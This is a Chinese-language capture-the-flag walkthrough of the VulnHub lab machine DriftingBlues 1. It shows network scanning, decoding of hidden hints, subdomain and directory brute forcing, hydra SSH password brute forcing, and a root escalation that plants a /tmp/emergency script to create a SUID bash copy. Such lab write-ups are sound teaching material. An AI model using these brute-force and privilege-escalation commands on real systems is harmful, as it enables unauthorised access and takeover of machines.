靶机18 driftingblues1

描述: __________

获取标志

难度：简单

1、下载靶场

靶机名称：driftingblues

下载地址：

DriftingBlues: 1 ~ VulnHub

2、安装靶场

以DC-1为例，将文件解压（一压缩包形式进行下载）。

打开虚拟机，选择解压好的文件导入虚拟机（ vof 版本高于4.0，点击重试即可导入）

导入成功，开启此虚拟机（ 当页面出现 driftingblues login 时表示安装成功）。

3、获取靶机的flag（两个flag）

前提：

1、已知kali的IP地址（ifconfig）

—— kali IP地址：192.168.108.129/24

2、driftingblues 和kali在同一网段 | 已知 driftingblues 所在的网段

—— driftingblues IP地址：192.168.108.162/24

信息收集

获取 driftingblues 的IP地址

命令：arp-scan -I eth0 -l

端口扫描

命令：nmap -sV -p- -O 192.168.108.162

//-sV：扫描系统版本和程序版本号检测，-p-：全端口扫描

获取信息如下：

端口号

服务

版本

22

ssh

OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)

80

http

Apache httpd 2.4.18 ((Ubuntu))

操作系统：OS details: Linux 4.15 - 5.6

访问80端口的web页面，查看源码发现了一个应该是base64加密的密文（L25vdGVmb3JraW5nZmlzaC50eHQ=）

密文：L25vdGVmb3JraW5nZmlzaC50eHQ=

解密：/noteforkingfish.txt

访问 /noteforkingfish.txt 文件之后发现还是一个跟明显的加密（ook加密）

ook解密：

my man, i know you are new but you should know how to use host file to reach our secret location. -eric

密文：

解密：

获得提示：eric（猜测是一个用户名），还提到了 host file（猜测是需要修改hosts文件，绑定域名）

目录扫描也没有什么发现，可能域名就在主页，在主页中找到一个可以域名，绑定之后进行子域名爆破

dirb http://192.168.108.162

结合首页中的疑似域名（driftingblues.box）修改hosts文件，尝试进行子域名爆破

绑定ip、域名

重新使用gobuster进行本地域名爆破,这里如果出现错误无法扫描成功的话，重启一下靶机，再把刚刚填写上的数据删掉，再填写一次，最后再次尝试即可解决问题

探测到一个子域名：test.driftingblues.box

直接访问不成功，将test.driftingblues.box再写入host再访问

写入之前：

写入之后：

进行目录爆破，得到两个目录地址（index.html、robots.txt）

dirb http://test.driftingblues.box

访问 robots.txt 文件，获得了新的目录地址：/ssh_cred.txt

访问 /ssh_cred.txt 地址（http://test.driftingblues.box/ssh_cred.txt）

根据提示信息可以知道 ssh 的登陆密码就是 1mw4ckyyucky 加一个数字，尝试制作密码字典和之前获取到的用户名（eric）对ssh进行暴力破解

九头蛇爆破ssh，成功跑出来一组账号密码（eric、1mw4ckyyucky6）

hydra -l eric -P Desktop/passwd1 ssh://192.168.108.162

使用该长啊后密码（eric、1mw4ckyyucky6）进行ssh登录之后在当前目录下获取到第一个flag（user.txt）

查看是否存在和sudo提权suid提权，没有太好的突破点

sudo -l

find / -perm -4000 2>/dev/null

查看是否有定时执行的计划任务或者备份文件

为了便于查看，给靶机上传一个 pspy64s 文件

执行pspy64s

可以看到 root用户每分钟都会执行一次 /var/backups/backup.sh 文件

研究一下 /var/backups/backup.sh 脚本文件，看看有没有提权的办法

脚本内容：

#!/bin/bash

/usr/bin/zip -r -0 /tmp/backup.zip /var/www/

/bin/chmod

#having a backdoor would be nice

sudo /tmp/emergency

查看发现脚本中最后一条命令（sudo /tmp/emergency）中执行的文件（/tmp/emergency）并不存在

提权思路：

创建一个 /tmp/emergency 文件，在root在执行 sudo /tmp/emergency 的时候完成提权

原理：将 eric用户加入 sudo组中（echo 'cp /bin/bash /tmp/getroot; chmod +s /tmp/getroot' > /tmp/emergency）

在 root用户 sudo 执行该文件之后成功提权，在 root用户的家目录下获取到第二个flag（root.txt）